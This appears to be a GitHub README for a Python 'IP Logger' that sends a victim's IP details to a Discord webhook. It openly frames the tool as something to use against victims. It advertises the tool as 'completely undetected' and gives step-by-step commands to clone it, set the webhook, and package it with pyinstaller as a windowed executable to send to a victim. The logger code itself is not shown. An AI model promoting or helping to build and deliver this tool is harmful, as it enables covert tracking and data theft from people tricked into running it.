asisamko / IP-Logger-Webhook

IP Address Logger what sends victim`s info to a Discord Webhook.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Simple IP Address Logger

A simple IP Address Logger for Discord Webhook written in Python. πŸ“‘

πŸ‘€ Features

  • βœ… Customizable Webhook address and name
  • βœ… Shows IP details directly in the webhook
  • βœ… Completly undetected
  • βœ… Simple to use
  • ⌚ I`m releasing .EXE builder very soon (I have some problems)
  1. After you open the file it will grab your IP Address and send it to a Discord Webhook
  2. You can send the Python script to the victim or convert it to the .EXE file with pyinstaller Tutorial below

πŸ“Έ Webhook preview

App Screenshot

πŸ“ Download and Usage

  • Create a Discord Webhook on your server and copy the address

  • Download the script

  git clone https://github.com/asisamko/IP-Logger-Webhook.git

or Code > Download ZIP

  • Install dependencies
  pip install -r requirements.txt
  • Edit the webhook address and name in the logger.py

  • Run the code (CMD / Terminal)

  python logger.py

πŸ’Ύ How to convert

  • Install pyinstaller with pip
  pip install pyinstaller
  • Build the executable file
  pyinstaller --noconfirm --onefile --windowed --name "exe-file-name"  "this-python-script-path"
  • You should get an executable file that you can send to the victim

This project is still in development as you can see ;)

About

IP Address Logger what sends victim`s info to a Discord Webhook.


Languages

Language:Python 100.0%